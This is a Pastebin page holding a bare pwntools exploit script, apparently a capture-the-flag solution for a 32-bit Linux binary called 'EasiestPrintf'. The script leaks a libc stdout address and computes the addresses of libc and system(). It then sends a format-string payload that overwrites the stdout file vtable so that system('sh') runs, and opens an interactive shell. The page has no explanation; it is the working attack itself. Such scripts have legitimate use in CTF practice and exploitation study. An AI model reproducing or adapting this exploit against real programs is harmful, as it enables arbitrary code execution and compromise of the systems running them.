Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- context(arch = 'i386', os = 'linux')
- libc = ELF('libc.so.6')
- BINARY = "EasiestPrintf"
- r = process(BINARY)
- print "attach %d" % r.pid
- STDOUT = 0x0804A044
- def hackIt():
- r.recvuntil("Which address you wanna read:\n")
- r.sendline(str(STDOUT))
- _IO_2_1_stdout_ = int(r.recv(10),16)
- _IO_file_jumps = _IO_2_1_stdout_ + 0x94
- libc_base = _IO_2_1_stdout_ - libc.symbols['_IO_2_1_stdout_']
- system = libc_base + libc.symbols['system']
- log.info('_IO_2_1_stdout_: %#x' % _IO_2_1_stdout_)
- log.info('_IO_file_jumps: %#x' % _IO_file_jumps)
- log.info('libc_base: %#x' % libc_base)
- log.info('system: %#x' % system)
- r.recvuntil("Good Bye\n")
- offset_buf = 7
- new_IO_file_jumps = _IO_2_1_stdout_+0x150
- payload = fmtstr_payload(offset_buf, {_IO_file_jumps : new_IO_file_jumps, new_IO_file_jumps+0x1c : system, _IO_2_1_stdout_:u32("sh\x00\x00")}, write_size="short")
- raw_input("debug?")
- r.sendline(payload)
- r.interactive()
- hackIt()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement